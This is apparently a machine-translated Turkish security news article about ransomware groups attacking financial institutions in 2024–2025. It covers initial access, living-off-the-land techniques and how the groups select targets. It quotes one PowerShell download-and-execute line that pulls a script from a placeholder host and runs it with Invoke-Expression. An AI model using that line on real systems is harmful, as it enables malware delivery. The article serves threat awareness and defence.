Finans sektörü, Nisan 2024 ile Nisan 2025 arasında kaydedilen şaşırtıcı 406 kamuoyu açıklanmış olaylarla birlikte gelişmiş fidye yazılımı operasyonları için birincil hedef olarak ortaya çıkmıştır.
Bu saldırılar giderek daha ileri düzeyde teknik yetenekler ve stratejik hedefleme göstererek önemli operasyonel aksamalara neden oldu ve hassas finansal verileri ortaya çıkardı.
Yüksek değerli varlıkların yoğunlaşması ve finansal hizmetlerin kritik doğası, bu kurumları fidye taleplerine karşı özellikle savunmasız hale getirir ve tehdit aktörleri yasadışı karlarını en üst düzeye çıkarmak için bu aciliyetten yararlanır.
.png
)
Bu saldırılarda endişe verici bir eğilim, fidye yazılımı dağıtım taktiklerinin hızlı bir şekilde evrimidir ve tehdit aktörleri finansal ağlarda kalıcılık oluşturmak için aynı anda birden fazla vektörden yararlanır.
En üretken gruplar-ransomhub, Akira, Lockbit, dağınık örümcek ve Lazarus Grubu, bankacılık altyapısında yaygın olan güvenlik kontrollerini atlamak için özel teknikler geliştirdi ve genellikle tespitten kaçınacak meşru finansal belge formatlarına kötü niyetli kodları gömdü.
Operasyonları, şifreleme rutinlerinin tetiklenmesinden haftalar veya aylar süren keşif dönemlerinin kanıtı göstermektedir, bu da maksimum veri eksfiltrasyonu ve yanal harekete izin verir.
Flashpoint analistleri, bu üst düzey rakipler arasında önemli teknik karmaşıklığı belirledi ve birçoğunun kötü niyetli faaliyetleri meşru operasyonlarla harmanlamak için yerel pencerelerin idari araçlarını kötüye kullanan karadan geçme tekniklerini benimsediğini belirtti.
Bu yaklaşımın, finansal kurumlar arasında konuşlandırılan geleneksel imza tabanlı tespit sistemlerine karşı özellikle etkili olduğunu kanıtlamıştır.
Analistler ayrıca, PowerShell betiğinin sık sık kalıcılık mekanizmaları oluşturmak için kullanıldığını gözlemlediler ve birçok saldırı tehlikeye atılmış VPN kimlik bilgileri veya eşleştirilmemiş uzaktan erişim sistemlerinden başlıyor.
Bu saldırıların arkasındaki finansal motivasyon açıktır, fidye talepleri, mağdurun yıllık gelirinin bir yüzdesine sık sık kalibre edilmiştir-dikkatli bir saldırı öncesi istihbarat toplama ile mümkün kıldı.
Bu hedefleme hassasiyeti, bu tehdit aktörlerinin finansal kurumlara karşı kampanyalar planlarken aldığı metodik yaklaşımı göstermektedir ve genellikle düzenleyici dosya verilerine ve kamu finansal açıklamalarına dayalı mağdurları seçmektedir.
İlk Erişim Teknikleri: Finansal Sistemlere Kapı Yatağı
Bu 406 olayında gözlemlenen baskın enfeksiyon vektörü, çalışanları ayrıcalıklı erişimi hedefleyen sofistike sosyal mühendislik kampanyalarını içermektedir.
.webp)
Tipik saldırı dizilerinde, tehdit aktörleri önce enfeksiyon zincirini başlatan gizli makro kodu içeren özel hazırlanmış belgeler sunar:-
$webclient = New-Object System.Net.WebClient
$payload = $webclient.DownloadString('https://compromised-domain.com/payload.ps1')
Invoke-Expression $payloadBu başlangıç erişim kodu, daha karmaşık kötü amaçlı yazılım bileşenlerini bırakmadan önce genellikle komut ve kontrol altyapısı ile temas kurar.
Özellikle, kimlik bilgisi hırsızlık araçları, saldırı sırasına erken konuşlandırılır ve finansal ağlar arasında yanal hareket sağlar.
Belgelenen olayların birçoğu, güvenlik uyarılarını tetiklemeden kalıcılık oluşturmak için Bginfo ve Sysinternals kamu hizmetleri gibi meşru idari araçların manipülasyonunu içeriyordu.
Fidye yazılımı grupları, hedefleme stratejilerinde dikkate değer bir uyum gösterdi, Ransomhub sadece Şubat 2024’te ortaya çıktı, ancak hızlı bir şekilde 38 finans sektörü kurbanı sofistike tedarik zinciri uzlaşmaları yoluyla iddia etti.
Bu arada, Akira’nın kampanyaları, geçersiz konti fidye yazılımı grubuna potansiyel bağlantılar gösteriyor ve bu suç işletmeleri arasında uzmanlığın sürekliliğini gösteriyor.
Are you from the SOC and DFIR Teams? – Analyse Real time Malware Incidents with ANY.RUN -> Start Now for Free.